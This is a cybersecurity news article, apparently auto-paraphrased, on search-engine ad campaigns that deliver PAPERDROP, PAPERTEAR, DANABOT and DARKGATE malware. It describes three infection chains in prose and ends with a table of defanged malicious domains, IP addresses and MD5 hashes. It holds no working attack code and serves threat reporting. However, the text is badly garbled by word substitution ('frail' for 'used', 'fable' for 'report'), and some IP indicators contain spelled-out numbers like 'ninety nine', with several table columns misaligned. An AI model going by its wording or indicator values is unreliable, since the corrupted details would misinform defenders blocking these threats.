Hackers Abusing Search Engine Ads to Deliver DANABOT & DARKGATE Malwares
Threat actors are shopping adverts for malicious internet sites to lure victims into downloading malware, which is fascinating to finally lead to files theft and ransomware.
This intention became as soon as frail in a lot of advert platforms, including search engine adverts and social media adverts, as they give a broad fluctuate of controls esteem explicit audiences, geographic areas, IP take care of ranges, taking a gaze history, and instrument sorts.
Search Engine Ads Bring Malware
Per the reports shared with Cyber Safety News, there were four diversified malware households noticed right by the investigation of those malicious advert campaigns, which were,
- PAPERDROP – VBScript-based downloader that communicates with HTTPS and likewise downloads and executes DANABOT.
- PAPERTEAR – VBScript-based downloader noticed to enumerate the checklist of local processes.
- DANABOT – Backdoor written in Delphi that uses personalized binary protocol over TCP.
- DARKGATE – Backdoor written in Delphi that is succesful of taking pictures keystrokes, executing instructions, file switch, and credential theft.
To boot to this three diversified provide chains were noticed in two of them frail a renamed version of cURL binary.
An infection Chain #1: PAPERDROP > DANABOT
In this an infection chain, the wscript.exe assignment is frail to initial a DNS query which then executes the Windows installer utility msiexec.exe and installs an software. Furthermore, it uses the rundll32.exe assignment to load the dropper DLL and executes the “initiate” characteristic to initiate the DANABOT payload.
An infection Chain #2: PAPERTEAR > RENAMED CURL > DARKGATE
In this 2d an infection chain, the PAPERTEAR downloader initiates an HTTP POST query to infocatalog[.]pics over port 8080. After this, the wscript.exe executes the one-liner present that finally drops the DARKGATE malware onto the victim’s diagram.
An infection Chain #3: PAPERDROP > RENAMED CURL > DANABOT
The third execution chain is equal to the 2d one nonetheless here the PAPERDROP downloader executes one other extended one-liner that uses the renamed curl.exe binary for downloading and installing a malicious package file which drops the DANABOT malware.
Furthermore, a whole fable has been revealed which provides detailed files regarding the malware capabilities, execution strategies, chains, and diversified files.
Indicators of Compromise
Form | Value | Campaign | Malware Family | Attribution |
Domain | www.claimprocessing[.]org | 23-046 | UNC2975 | |
Domain | www.treasurydept[.]org | 23-046 | UNC2975 | |
Domain | www.assetfinder[.]org | 23-046 | UNC2975 | |
Domain | gfind[.]org | 23-046 | UNC2975 | |
Domain | claimunclaimed[.]org | 23-046 | UNC2975 | |
Domain | treasurydept[.]org | 23-046 | UNC2975 | |
Domain | www.myunclaimedcash[.]org | 23-046 | UNC2975 | |
Domain | freelookup[.]org | 23-046 | UNC2975 | |
Domain | capitalfinders[.]org | 23-046 | UNC2975 | |
Domain | plano.soulcarelife[.]org | 23-046 | PAPERDROP | UNC2975 |
Domain | pittsburgh.soulcarelife[.]org | 23-046 | PAPERDROP | UNC2975 |
Domain | durham.soulcarelife[.]org | 23-046 | PAPERDROP | UNC2975 |
Domain | mesa.halibut[.]sbs | 23-046 | PAPERDROP | UNC2975 |
Domain | arlington.barracudas[.]sbs | 23-046 | PAPERDROP | UNC2975 |
Domain | lugbara[.]top | 23-046 | PAPERDROP | UNC2975 |
Domain | lewru[.]top | 23-046 | PAPERDROP | UNC2975 |
Domain | infocatalog[.]pics | 23-046 | DARKGATE | UNC5085 |
Domain | bikeontop[.]shop | 23-046 | DARKGATE | UNC5085 |
Domain | positivereview[.]cloud | 23-046 | DARKGATE | UNC5085 |
Domain | dreamteamup[.]shop | 23-046 | DARKGATE | UNC5085 |
Domain | whatup[.]cloud | 23-046 | DARKGATE | UNC5085 |
Domain | thebesttime[.]buzz | 23-046 | DARKGATE | UNC5085 |
IP Address | 47.253.165[.]1 | 23-046 | UNC2975 | |
IP Address | 8.209.ninety nine[.]230 | 23-046 | UNC2975 | |
IP Address | 47.252.forty five[.]173 | 23-046 | UNC2975 | |
IP Address | 47.252.33[.]131 | 23-046 | UNC2975 | |
IP Address | 47.253.141[.]12 | 23-046 | UNC2975 | |
IP Address | 47.252.forty five[.]173 | 23-046 | UNC2975 | |
IP Address | 34.16.181[.]0 | 23-046 | DANABOT | |
IP Address | 35.247.194[.]72 | 23-046 | DANABOT | |
IP Address | 35.203.111[.]228 | 23-046 | DANABOT | |
IP Address | 94.228[.]169[.]143 | 23-051 | PAPERTEAR | UNC5085 |
MD5 | 9f9c5a1269667171e1ac328f7f7f6cb3 | 23-046 | DARKGATE | UNC5085 |
MD5 | 2c16eafd0023ea5cb8e9537da442047e | 23-046 | PAPERDROP (Form I) | UNC2975 |
MD5 | 7544f5bb88ad481f720a9d9f94d95b30 | 23-046 | PAPERDROP(Form I) | UNC2975 |
MD5 | 862a42a91b5734062d47c37fdd80c633 | PAPERDROP(Form II) | UNC2956 | |
MD5 | 650b0b12b21e9664d5c771d78738cf9f | PAPERTEAR | UNC5085 | |
MD5 | 9120c82b0920b9db39894107b5494ccd | 23-051 | PAPERTEAR | UNC5085 |
Source credit : cybersecuritynews.com